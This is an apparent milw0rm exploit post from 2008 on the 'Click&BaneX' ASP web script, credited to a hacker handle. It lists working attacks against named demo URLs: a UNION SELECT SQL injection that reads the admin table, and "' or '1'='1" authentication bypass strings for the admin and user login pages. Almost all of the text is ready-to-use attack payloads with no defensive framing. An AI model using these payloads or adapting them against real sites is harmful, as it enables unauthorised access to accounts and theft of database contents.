########################################################################### #-------------------------------AlpHaNiX----------------------------------# ########################################################################### #Found By : AlpHaNiX #website : www.offensivetrack.org #contact : AlpHa[AT]HACKER[DOT]BZ ########################################################################### #script : Click&BaneX #download : null #Demo : http://icash.ch/ClickAndBanexDemo/user/ %00 http://icash.ch/ClickAndBanexDemo/admin/ ########################################################################### #Exploits : --=[SQL INJECTION]=-- http://icash.ch/ClickAndBanexDemo/user/user_menu.asp?user=wd2505&ID=0+union+select+1,2,3,4,5,6,7,9,10,11,12,13,15,16,17+from+admin%00 ########################################################################## --=[AUTH BYPASS]=-- -----ADMIN PAGE---- http://icash.ch/ClickAndBanexDemo/admin/admin_menu.asp USERNAME : ' or '1'='1 PASSWORD : ' or '1'='1 -----USER PAGE---- http://icash.ch/ClickAndBanexDemo/user/user_menu.asp USERNAME : ' or '1'='1 PASSWORD : ' or '1'='1 #Greetz For My Best Friend ZIGMA ########################################################################### # milw0rm.com [2008-12-15]